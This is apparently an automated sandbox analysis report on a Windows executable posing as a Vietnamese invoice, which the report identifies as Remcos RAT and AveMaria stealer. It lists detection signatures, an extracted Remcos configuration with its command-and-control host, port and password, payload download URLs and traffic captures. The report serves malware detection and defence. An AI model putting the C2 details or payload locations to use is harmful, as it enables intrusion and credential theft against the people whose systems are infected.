Windows Analysis Report
Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Overview

General Information

Sample Name:	Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Analysis ID:	778240
MD5:	a07407fce937593044ad512f4a6d7a1e
SHA1:	6fc304eb3856198c1f8b1da8c4a3a52c657274c7
SHA256:	770a25e30c2f095a09570447fd3ab6ecb78de00185d39035a1b87b1d7de89f8c
Tags:	exe
Infos:

Detection

Remcos, AveMaria

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Remcos

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Yara detected AveMaria stealer

Multi AV Scanner detection for domain / URL

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Yara detected Costura Assembly Loader

Encrypted powershell cmdline option found

Machine Learning detection for sample

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Tries to steal Instant Messenger accounts or passwords

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Creates processes with suspicious names

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: obologs.work.gd

Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	ReversingLabs: Detection: 27%
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Virustotal: Detection: 30%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for domain / URL

Source: obologs.work.gd

Virustotal: Detection: 14%

Perma Link

Machine Learning detection for sample

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 12.0.aspnet_compiler.exe.400000.0.unpack

Avira: Label: BDS/Backdoor.Gen

Source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "obologs.work.gd:4044:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-E9KXT7", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Uses 32bit PE files

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10006580 FindFirstFileExA,	12_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,	14_2_0040AE51

Networking

May check the online IP address of the machine

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: obologs.work.gd

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.43.12 13.107.43.12
Source: Joe Sandbox View	IP Address: 194.5.98.244 194.5.98.244

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49699 -> 194.5.98.244:4044

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globals
Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.360708645.0000000003E02000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.480125724.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.563713408.0000000006E90000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.529750715.0000000000884000.00000004.00000020.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
